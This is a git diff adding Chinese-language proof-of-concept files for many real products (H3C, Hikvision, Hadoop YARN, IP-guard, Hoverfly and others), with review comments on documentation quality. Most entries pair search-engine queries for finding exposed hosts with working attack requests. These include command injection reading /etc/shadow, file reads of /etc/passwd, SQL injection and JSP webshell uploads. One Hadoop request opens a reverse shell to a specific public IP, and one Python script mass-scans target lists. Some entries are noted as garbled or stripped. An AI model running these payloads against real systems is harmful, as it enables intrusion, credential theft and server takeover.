+![1693536284723-c565c1e4-eb3c-434d-8d79-7a0cdb06204b.png](./img/MqXw12ts-2hI9P3j/1693536284723-c565c1e4-eb3c-434d-8d79-7a0cdb06204b-398196.png) + +5. 可在`远程管理`->`远程telnet管理`处开启telnet获取命令执行权限 + +![1693536401401-e5557bea-3c29-49ca-bdf4-9f1b8e4d2cdf.png](./img/MqXw12ts-2hI9P3j/1693536401401-e5557bea-3c29-49ca-bdf4-9f1b8e4d2cdf-114600.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: \ No newline at end of file diff --git a/H3C多系列路由器存在前台远程命令执行漏洞.md b/H3C多系列路由器存在前台远程命令执行漏洞.md new file mode 100644 index 0000000..5ac5d32 --- /dev/null +++ b/H3C多系列路由器存在前台远程命令执行漏洞.md 
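Review bot: the path given in `# 一、漏洞简介` and in step 1 of `# 四、漏洞复现` (`userLog in.asp/actionpalicy_status1./xxxx.cfg`, with a space in `userLog in`, `actionpalicy` misspelled and `1.` where the request has `/../`) does not match the request block, which uses `/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg`; the prose example is also `ER5200G2` while the request is `ER2200G2`. Align prose and request, and fix the remaining typos (`统过` for `绕过`, `telenet`, the stray `》` after `GR 系列`, `ERN ERG2N`). Step 3 records that the `vtypasswd` field holds the plaintext admin password; that is the impact statement a defender needs and belongs in the summary. No remediation section.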
@@ -0,0 +1,37 @@ +# H3C多系列路由器存在前台远程命令执行漏洞 + +# 一、漏洞简介 + H3C多系列路由器存在前台远程命令执行漏洞。 + +# 二、影响版本 ++ H3C多系列路由器 + +# 三、资产测绘 ++ hunter`app.name="H3C Router Management"` ++ 登录页面 + +![1693536029401-fe49c297-e04b-42c4-8935-a0a3181716cd.png](./img/z8D5fn4DzBurWTEr/1693536029401-fe49c297-e04b-42c4-8935-a0a3181716cd-011282.png) + +# 四、漏洞复现 +```java +POST /goform/aspForm HTTP/1.1 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 76 +Host: + +CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1; $(ls>/www/test); +``` + +![1708148458826-c9fecdad-19a8-4f2f-afb8-2edb86c89119.png](./img/z8D5fn4DzBurWTEr/1708148458826-c9fecdad-19a8-4f2f-afb8-2edb86c89119-875058.png) + +```java +/test +``` + +![1708148479113-de8c50b3-1388-4543-b5ad-245ab43716a0.png](./img/z8D5fn4DzBurWTEr/1708148479113-de8c50b3-1388-4543-b5ad-245ab43716a0-505670.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: \ No newline at end of file diff --git a/HANDLINK-ISS-7000v2网关login_handler.cgi未授权RCE漏洞.md b/HANDLINK-ISS-7000v2网关login_handler.cgi未授权RCE漏洞.md new file mode 100644 index 0000000..8a546c5 --- /dev/null +++ b/HANDLINK-ISS-7000v2网关login_handler.cgi未授权RCE漏洞.md @@ -0,0 +1,23 @@ +# HANDLINK-ISS-7000v2网关login_handler.cgi未授权RCE漏洞 + +瀚霖科技股份有限公司ISS-7000 v2网络网关服务器 /login_handler.cgi接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。 + +## fofa + +```javascript +icon_hash="-842942564" +``` + +## poc + +```javascript +POST /login_handler.cgi HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Content-Type: application/x-www-form-urlencoded +Connection: close + +username=admin&password=admin|id&uilng=3&button=%E7%99%BB%E5%85%A5&Signin= +``` + +![image-20241108205108398](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411082051455.png) \ No newline at end of file diff --git a/HCM-Cloud云端专业人力资源平台download任意文件读取漏洞.md b/HCM-Cloud云端专业人力资源平台download任意文件读取漏洞.md new file mode 100644 index 0000000..708860b 
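Review bot: in `H3C多系列路由器存在前台远程命令执行漏洞.md` the `# 一、漏洞简介` line only repeats the title, `Host:` is empty, and the POST body line contains `¶m=1`, which looks like an HTML-entity conversion artifact in the stored text; the entry should be checked against its source and given a description, affected version and remediation as the IMC file has. The second fence containing only `/test` needs a sentence saying what it is (the path where the `$(ls>/www/test)` output is written).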
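Review bot: in `HANDLINK-ISS-7000v2网关login_handler.cgi未授权RCE漏洞.md` the fofa and poc fences are tagged ```javascript for a search query and a raw HTTP request; use ```plain as the numbered-section files do. `Host:` is empty. There is no affected-version, fixed-version or remediation section and no `漏洞来源` link, so the claim in the opening paragraph (unauthenticated command execution through `username=admin&password=admin|id`) cannot be traced to an advisory.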
--- /dev/null +++ b/HCM-Cloud云端专业人力资源平台download任意文件读取漏洞.md @@ -0,0 +1,26 @@ +# HCM-Cloud云端专业人力资源平台download任意文件读取漏洞 + +HCM-Cloud云端专业人力资源平台download任意文件读取漏洞 + +## fofa + +```javascript +icon_hash="-859381597" +``` + +## poc + +```javascript +GET /api/model_report/file/download?index=/&ext=/etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 +Connection: close +``` + +![3ccd7062314c3695db376759d9f74d02](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410241250278.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/nvV7_ZGDqSUZJ5FNEWDhKw \ No newline at end of file diff --git a/HEYBBS2.1论坛search.php存在sql注入漏洞.md b/HEYBBS2.1论坛search.php存在sql注入漏洞.md new file mode 100644 index 0000000..5ee2159 --- /dev/null +++ b/HEYBBS2.1论坛search.php存在sql注入漏洞.md @@ -0,0 +1,28 @@ +# HEYBBS2.1论坛search.php存在sql注入漏洞 + +HEYBBS2.1论坛在search.php接口下存在sql注入漏洞 + +## fofa + +```javascript +Body="微社区, 微论坛, 微博客" +``` + +## poc + +```javascript +GET /search.php?sosuo=qq%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0xc,user(),0xc),NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Referer: https://fofa.info/ +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Priority: u=0, i +Pragma: no-cache +Cache-Control: no-cache + + +``` diff --git a/HSCMailinspectorloader存在任意文件读取漏洞(CVE-2024-34470).md b/HSCMailinspectorloader存在任意文件读取漏洞(CVE-2024-34470).md new file mode 100644 index 0000000..110ec68 --- /dev/null +++ b/HSCMailinspectorloader存在任意文件读取漏洞(CVE-2024-34470).md 
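Review bot: in `HCM-Cloud云端专业人力资源平台download任意文件读取漏洞.md` the description line merely repeats the title; a sentence on what the product is and what the `download?index=/&ext=/etc/passwd` parameters do is needed, plus an affected version. It does carry a `## 漏洞来源` link, which most other new files in this batch lack; keep that convention. In `HEYBBS2.1论坛search.php存在sql注入漏洞.md` the fofa query uses `Body=` where the other files use lowercase `body=`, the fences are tagged ```javascript, the request fence ends with two blank lines, and there is no source link, version or screenshot; the `sosuo` parameter named in the request should be stated in prose as the injection point.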
@@ -0,0 +1,31 @@ +# HSC Mailinspector loader存在任意文件读取漏洞(CVE-2024-34470) + +# 一、漏洞简介 +HSC Mailinspector是一款邮件安全解决方案,旨在保护企业邮件系统免受垃圾邮件、恶意软件和其他类型的网络威胁。该解决方案可以检测和过滤垃圾邮件、病毒、木马和其他类型的恶意软件,并提供详细的报告和日志记录,以帮助管理员跟踪和分析邮件流量。 HSC Mailinspector loader接口处存在任意文件读取漏洞(CVE-2024-34470),恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。 + +# 二、影响版本 ++ HSC Mailinspector + +# 三、资产测绘 +```plain +body="mailinspector/public" +``` + +![1717748023362-4f8c75dc-fe58-44aa-91b5-bef491d33e17.png](./img/dqMWRZ4U8g1HnlWV/1717748023362-4f8c75dc-fe58-44aa-91b5-bef491d33e17-597820.png) + +# 四、漏洞复现 +```plain +GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + +![1717747998713-627b906c-51cb-46d6-8f79-b66ba599ccbe.png](./img/dqMWRZ4U8g1HnlWV/1717747998713-627b906c-51cb-46d6-8f79-b66ba599ccbe-035461.png) + + + +> 更新: 2024-06-11 10:34:10 +> 原文: \ No newline at end of file diff --git a/Hadoop存在未授权访问导致的RCE.md b/Hadoop存在未授权访问导致的RCE.md new file mode 100644 index 0000000..586b4bd --- /dev/null +++ b/Hadoop存在未授权访问导致的RCE.md 
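Review bot: the CVE is named (`CVE-2024-34470`) but `# 二、影响版本` lists only the product; the CVE record's version range and fixed version belong here. `Host:` is empty while sibling files use `xx.xx.xx.xx`. `# 四、漏洞复现` shows `/mailinspector/public/loader.php?path=../../../../../../../etc/passwd`; naming the `path` parameter of `loader.php` in `# 一、漏洞简介` would let a defender write a rule without reading the raw request.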
@@ -0,0 +1,53 @@ +# Hadoop存在未授权访问导致的RCE + +# 一、漏洞描述 +Hadoop的核心设计包括分布式文件系统(HDFS)和MapReduce编程模型。HDFS是一个高容错性的分布式文件系统,设计用于在低成本的硬件上运行,提供高吞吐量以访问大规模数据。而MapReduce则是一种处理大规模数据的计算模型,它将应用程序分解成许多小的任务,这些任务可以在分布式集群的任何节点上执行。Hadoop的这些特性使其成为一个适合处理海量数据的平台,广泛应用于大数据存储和处理领域。由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。 + +# 二、影响版本 +Hadoop + +# 三、资产测绘 +```plain +app="APACHE-hadoop-YARN" +``` + +![1730007748480-f12e937d-352a-4a44-8f45-4eadcefc02cd.png](./img/XntizMfXiFnObJzU/1730007748480-f12e937d-352a-4a44-8f45-4eadcefc02cd-735372.png) + +# 三、漏洞复现 +```plain +POST /ws/v1/cluster/apps/new-application HTTP/1.1 +Host: +Content-Type: application/json +Content-Length: +``` + +![1730007792679-ad65176c-9062-4cb1-bde3-db16dcc3f638.png](./img/XntizMfXiFnObJzU/1730007792679-ad65176c-9062-4cb1-bde3-db16dcc3f638-482756.png) + +反弹shell + +```plain +POST /ws/v1/cluster/apps HTTP/1.1 +Host: +Content-Type: application/json +Content-Length: 256 + +{ + "application-id": "application_1234567890123_0001", + "application-name": "get-shell", + "am-container-spec": { + "commands": { + "command": "/bin/bash -i >& /dev/tcp/81.71.17.84/9999 0>&1" + } + }, + "application-type": "YARN" +} +``` + +![1730007867558-d3e6bed6-3b8b-4c27-9b67-29b40cb1395e.png](./img/XntizMfXiFnObJzU/1730007867558-d3e6bed6-3b8b-4c27-9b67-29b40cb1395e-570056.png) + +![1730007901286-aceda32c-bc50-40b7-9e28-fba103dfd98a.png](./img/XntizMfXiFnObJzU/1730007901286-aceda32c-bc50-40b7-9e28-fba103dfd98a-766970.png) + + + +> 更新: 2024-11-27 10:04:43 +> 原文: \ No newline at end of file diff --git a/HiKVISION-综合安防管理平台-任意文件上传漏洞.md b/HiKVISION-综合安防管理平台-任意文件上传漏洞.md new file mode 100644 index 0000000..cddd90d --- /dev/null +++ b/HiKVISION-综合安防管理平台-任意文件上传漏洞.md 
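Review bot: the reverse-shell command in the second request embeds a specific public IP (`/dev/tcp/81.71.17.84/9999`); a PoC repo should use an obvious placeholder there, not a live address. `Content-Length: 256` does not match the JSON body shown, and in the first request `Content-Length:` has no value. Section numbering repeats `# 三、` for both 资产测绘 and 漏洞复现. `# 一、漏洞描述` says the exposed service is the HDFS `50070` web port, but both requests go to the YARN ResourceManager REST API (`/ws/v1/cluster/apps/new-application`, `/ws/v1/cluster/apps`) and the fofa query is `app="APACHE-hadoop-YARN"`; the description should name the component actually exposed. No remediation section.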
@@ -0,0 +1,38 @@ +## fofa +``` +app="HIKVISION-iSecure-Center" +``` + +## HiKVISION 综合安防管理平台 report 任意文件上传漏洞 + +``` +POST /svm/api/external/report HTTP/1.1 +Host: 10.10.10.10 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + +------WebKitFormBoundary9PggsiM755PLa54a +Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp" +Content-Type: application/zip + +<%jsp的马%> + +------WebKitFormBoundary9PggsiM755PLa54a-- + +马儿路径:/portal/ui/login/..;/..;/new.jsp + +``` + +## HiKVISION 综合安防管理平台 files 任意文件上传漏洞 +``` +POST /center/api/files;.html HTTP/1.1 +Host: 10.10.10.10 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + +------WebKitFormBoundary9PggsiM755PLa54a +Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp" +Content-Type: application/zip + +<%jsp的马%> +------WebKitFormBoundary9PggsiM755PLa54a-- +``` +![image](https://github.com/wy876/POC/assets/139549762/8e3f6c98-9d8d-4ede-bd92-e16baee49a8d) diff --git a/Hoverfly系统接口simulation任意文件读取漏洞复现(CVE-2024-45388).md b/Hoverfly系统接口simulation任意文件读取漏洞复现(CVE-2024-45388).md new file mode 100644 index 0000000..7f8f0c4 --- /dev/null +++ b/Hoverfly系统接口simulation任意文件读取漏洞复现(CVE-2024-45388).md 
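Review bot: the file has no top-level title, description or version section; it opens directly with `## fofa`. In the first request block the line `马儿路径:/portal/ui/login/..;/..;/new.jsp` sits inside the code fence as if it were part of the HTTP request; move it out as prose. Both requests use `Host: 10.10.10.10`, which should follow the placeholder convention of the other files, and the `..;/..;/` path is the detection indicator worth stating explicitly. No source link.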
@@ -0,0 +1,25 @@ +# Hoverfly系统接口simulation任意文件读取漏洞复现(CVE-2024-45388) + +Hoverfly api/v2/simulation 接口存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +## fofa + +```jade +icon_hash="1357234275" +``` + +## poc + +```javascript +PUT /api/v2/simulation HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded + +{"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}} +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409101027771.png) \ No newline at end of file diff --git a/Hytec-Inter-HWL-2511-SS-popen.cgi命令注入漏洞.md b/Hytec-Inter-HWL-2511-SS-popen.cgi命令注入漏洞.md new file mode 100644 index 0000000..8687d0e --- /dev/null +++ b/Hytec-Inter-HWL-2511-SS-popen.cgi命令注入漏洞.md @@ -0,0 +1,12 @@ +## Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞 + +## fofa +``` +title="index" && header="lighttpd/1.4.30" +``` + +### poc +``` + +/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137921 +``` diff --git a/HytecInterHWL-2511-SS路由器popen.cgi命令注入漏洞.md b/HytecInterHWL-2511-SS路由器popen.cgi命令注入漏洞.md new file mode 100644 index 0000000..df37452 --- /dev/null +++ b/HytecInterHWL-2511-SS路由器popen.cgi命令注入漏洞.md 
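Review bot: in `Hoverfly系统接口simulation任意文件读取漏洞复现(CVE-2024-45388).md` the fofa fence is tagged ```jade, clearly a typo; affected and fixed versions are absent although the CVE is named, and the `PUT` request sends a JSON body under `Content-Type: application/x-www-form-urlencoded`. The `bodyFile` field in the JSON is the parameter at issue and should be named in the opening paragraph. `Hytec-Inter-HWL-2511-SS-popen.cgi命令注入漏洞.md` duplicates the next file in this commit (`HytecInterHWL-2511-SS路由器popen.cgi命令注入漏洞.md`), which covers the same `/cgi-bin/popen.cgi?command=` endpoint with more context; keep one entry. Its poc fence also starts with a blank line.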
@@ -0,0 +1,42 @@ +# Hytec Inter HWL-2511-SS路由器popen.cgi命令注入漏洞 + +# 一、漏洞简介 +Hytec Inter HWL-2511-SS是日本Hytec Inter公司的一种工业 LTE 路由器和 Wi-Fi 接入点。 Hytec Inter HWL-2511-SS popen.cgi存在安全漏洞,允许攻击者以root权限执行任意命令。 + +# 二、影响版本 ++ Hytec Inter HWL-2511-SS + +# 三、资产测绘 ++ hunter`app.name=="PROSCEND(及其他) Celluar Router "` + +![1692195674584-e5d0c9c1-db2b-4086-89d9-32e86c36007a.png](./img/4A0X6p-kZawMAx-b/1692195674584-e5d0c9c1-db2b-4086-89d9-32e86c36007a-554553.png) + ++ 登录页面 + +![1692195705957-a4726dd2-e296-4890-9a9c-4f2175496086.png](./img/4A0X6p-kZawMAx-b/1692195705957-a4726dd2-e296-4890-9a9c-4f2175496086-933108.png) + +# 四、漏洞复现 +```plain +GET /cgi-bin/popen.cgi?command=ping%20-c%201.1.1.1;cat%20/etc/shadow&v=0.130303344313792 HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +If-Modified-Since: Sun, 13 Oct 2019 19:17:17 GMT +If-None-Match: "18111784" +Te: trailers +Connection: close +``` + +![1692195751951-2903e0d0-9813-49e6-91ac-4a1f0b7d58e6.png](./img/4A0X6p-kZawMAx-b/1692195751951-2903e0d0-9813-49e6-91ac-4a1f0b7d58e6-393174.png) + + + +> 更新: 2024-02-29 23:57:15 +> 原文: \ No newline at end of file diff --git a/I-Doc-View任意文件上传漏洞.md b/I-Doc-View任意文件上传漏洞.md new file mode 100644 index 0000000..1660184 --- /dev/null +++ b/I-Doc-View任意文件上传漏洞.md 
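Review bot: this file and `Hytec-Inter-HWL-2511-SS-popen.cgi命令注入漏洞.md` in the same commit describe the same `popen.cgi` issue with slightly different request strings; consolidate them. The hunter query `app.name=="PROSCEND(及其他) Celluar Router "` has a trailing space and a `Celluar` typo; confirm it is the literal fingerprint. The browser-noise headers (`If-Modified-Since`, `If-None-Match: "18111784"`, `Sec-Fetch-*`, `Te: trailers`) add nothing; trim to the request line and `Host`. `# 一、漏洞简介` states the command runs as root, which is the impact claim a defender needs; a vendor advisory or CVE reference to back it is missing.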
@@ -0,0 +1,30 @@ + +## I Doc View任意文件上传漏洞 +I DOC VIEW是一个在线的文档查看器,其中的/html/2word接口因为处理不当,导致可以远程读取任意文件,通过这个接口导致服务器下载恶意的JSP进行解析,从而RCE。 + +## POC构造 +流程:携带恶意link[href]的html -> 远程获取 -> 解析出href -> 远程获取恶意文件 + +poc.html +```html + + + + + test + + + + + +``` +然后构造 `..\..\..\docview\poc.jsp` 这个是文件 +![image](https://github.com/wy876/POC/assets/139549762/736f7c0a-4f06-4170-805a-cf1580b69de3) + +![image](https://github.com/wy876/POC/assets/139549762/73ab1c2a-ad91-40a3-96b0-0ca978fa9abe) + +## 漏洞分析 +``` +https://mp.weixin.qq.com/s/lDqhDnZGXoRyp2IolQ2odg +https://mp.weixin.qq.com/s/mD4EcVmJ9QPmmMLh6KrZ0g +``` diff --git a/IP-guard-WebServer-远程命令执行漏洞.md b/IP-guard-WebServer-远程命令执行漏洞.md new file mode 100644 index 0000000..b97ca1e --- /dev/null +++ b/IP-guard-WebServer-远程命令执行漏洞.md 
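Review bot: the `poc.html` fence contains only blank lines and the word `test`; the `<link>` element that the `## POC构造` flow depends on (`携带恶意link[href]的html -> 远程获取 -> 解析出href`) has been stripped, so the entry as committed does not show what it claims to. The sentence `然后构造 ..\..\..\docview\poc.jsp 这个是文件` is not a complete statement. The `## 漏洞分析` links are the only analysis references in this batch; they belong under a `漏洞来源` heading as the HCM-Cloud file uses, and the `/html/2word` endpoint named in the summary should be stated as the detection indicator.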
@@ -0,0 +1,107 @@ +## IP-guard WebServer 远程命令执行漏洞 +IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。 + +## 影响版本 +``` +< IP-guard WebServer 4.81.0307.0 +``` + +## fofa +``` +"IP-guard" && icon_hash="2030860561" +``` + +## poc +``` +/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||ping%20dnslog +``` + +## 写php +``` +GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=||echo+^+>1.php HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + +## 漏洞复现 + +![](./assets/20231109165256.png) +![](./assets/20231109165333.png) + +## Python脚本 +```python +#!/usr/bin/python3 +# -*- coding:utf-8 -*- +# author:MDSEC +# from:https://github.com/MD-SEC/MDPOCS +# fofa:"IP-guard" && icon_hash="2030860561" +# + + +import sys +import requests +import csv +import urllib3 +import hashlib +from concurrent.futures import ThreadPoolExecutor +import time + +if len(sys.argv) != 2: + print( + '+----------------------------------------------------------------------------------------------------------+') + print( + '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS +') + print( + '+-------------------------------------------------------------------------------------------------- -------+') + print( + '+ USE: python3 +') + print( + '+ EXP: python3 Ip_Guard_Webserver_View_Rce_Poc.py url.txt +') + print( + '+-------------------------------------------------------------------------------------------------- --------+') + sys.exit() +proxysdata = { +'http': '127.0.0.1:8080' +} +def poc(host): + if "http" in host: + url = host + else: + url ="http://"+host + host1=url.replace("http://","") + host2=host1.replace("https://","") + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 
Firefox/111.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", + "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", + "Accept-Encoding": "gzip, deflate, br", + "Host":"%s" % host2 + } + vulurl = url + "/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||ping%20www.baidu.com" + try: + start_time = time.time() + r = requests.get(vulurl, headers=headers) + end_time = time.time() + response_time = end_time - start_time + if r.status_code==200 and response_time >2 and response_time<6 : + print(host+" :一定能打") + elif r.status_code==200: + print(host+" :大概率能打") + else: + print(host+" :不能打") + except: + return 0 + print (host+":false") + + +if __name__ == '__main__': + file = sys.argv[1] + data = open(file) + reader = csv.reader(data) + with ThreadPoolExecutor(50) as pool: + for row in reader: + pool.submit(poc, row[0]) +``` diff --git a/IP-guardWebServer权限绕过漏洞.md b/IP-guardWebServer权限绕过漏洞.md new file mode 100644 index 0000000..3f83c31 --- /dev/null +++ b/IP-guardWebServer权限绕过漏洞.md 
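Review bot: in the Python block the `except:` branch does `return 0` before `print (host+":false")`, so that line is unreachable, and the bare `except` hides every error; `urllib3` and `hashlib` are imported but unused, `proxysdata` is defined but never passed to `requests`, and the file opened with `open(file)` is never closed. The `## 影响版本` fence (`< IP-guard WebServer 4.81.0307.0`) is the only affected-version statement in this batch; the same `view.php?doc=...&page=||` issue is documented again in `IP-guardWebServer远程命令执行漏洞.md` later in this commit without that version, so cross-reference the two rather than keeping two entries.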
@@ -0,0 +1,35 @@ +# IP-guard WebServer 权限绕过漏洞 + +# 一、漏洞简介 +IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。由于IP-guard WebServer的权限验证机制中存在设计缺陷,远程攻击者能够规避安全验证,通过后端接口执行文件的任意读取和删除操作。 + +# 二、影响版本 ++ IP-guard + +# 三、资产测绘 ++ hunter`web.icon=="210a3c89d4ab5effa18d6dd7a9627376"` ++ 特征 + +![1699584205812-20797c54-6a49-4a18-a038-f0d965e86b5f.png](./img/KINBd9d7qOP907Rm/1699584205812-20797c54-6a49-4a18-a038-f0d965e86b5f-935578.png) + +# 四、漏洞复现 +```plain +POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 64 + +path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A +``` + +![1713513510100-89d8adee-54fa-473d-9e4b-7066cb308103.png](./img/KINBd9d7qOP907Rm/1713513510100-89d8adee-54fa-473d-9e4b-7066cb308103-142878.png) + + + +> 更新: 2024-04-19 16:02:33 +> 原文: \ No newline at end of file diff --git a/IP-guardWebServer远程命令执行漏洞.md b/IP-guardWebServer远程命令执行漏洞.md new file mode 100644 index 0000000..c91f651 --- /dev/null +++ b/IP-guardWebServer远程命令执行漏洞.md 
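Review bot: `Host:` is empty, and the prose never names the endpoint `/ipg/appr/MApplyList/downloadFile_client/getdatarecord` or the `path=..%2Fconfig.ini` parameter as the detection indicator; add that to `# 一、漏洞简介`. `# 二、影响版本` lists `IP-guard` with no version, and there is no fixed version or remediation even though the summary says the flaw is in the permission-check design, which implies a vendor fix exists to reference.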
@@ -0,0 +1,41 @@ +# IP-guard WebServer 远程命令执行漏洞 + +# 一、漏洞简介 +IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。IP-guard WebServer 存在远程命令执行漏洞。攻击者可利用该漏洞执行任意命令,获取服务器控制权限。 + +# 二、影响版本 ++ IP-guard + +# 三、资产测绘 ++ hunter`web.icon=="210a3c89d4ab5effa18d6dd7a9627376"` ++ 特征 + +![1699584205812-20797c54-6a49-4a18-a038-f0d965e86b5f.png](./img/3T4Q8T2NsWY0JGug/1699584205812-20797c54-6a49-4a18-a038-f0d965e86b5f-939078.png) + +# 四、漏洞复现 +```plain +GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=||echo+^+>2.php HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ipg_session=uiki60dds9f9jop2jpj0vn8h22aa3e1o +Upgrade-Insecure-Requests: 1 +``` + +![1699584258482-7fa4b92d-0349-42e7-acfb-46bde1b24107.png](./img/3T4Q8T2NsWY0JGug/1699584258482-7fa4b92d-0349-42e7-acfb-46bde1b24107-486349.png) + +获取命令执行结果 + +```plain +/ipg/static/appr/lib/flexpaper/php/2.php +``` + +![1699584306366-fbf98e4f-fd68-4cd6-9f88-28383acfde03.png](./img/3T4Q8T2NsWY0JGug/1699584306366-fbf98e4f-fd68-4cd6-9f88-28383acfde03-388051.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: \ No newline at end of file diff --git a/Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593).md b/Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593).md new file mode 100644 index 0000000..dadd027 --- /dev/null +++ b/Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593).md 
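Review bot: this file duplicates `IP-guard-WebServer-远程命令执行漏洞.md` from the same commit (same `/ipg/static/appr/lib/flexpaper/php/view.php?doc=...&page=||echo+^+>...php` request); consolidate, and carry over that file's `< IP-guard WebServer 4.81.0307.0` affected-version line, which is missing here. The request includes a captured `Cookie: ipg_session=uiki60dds9f9jop2jpj0vn8h22aa3e1o`; replace it with a placeholder.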
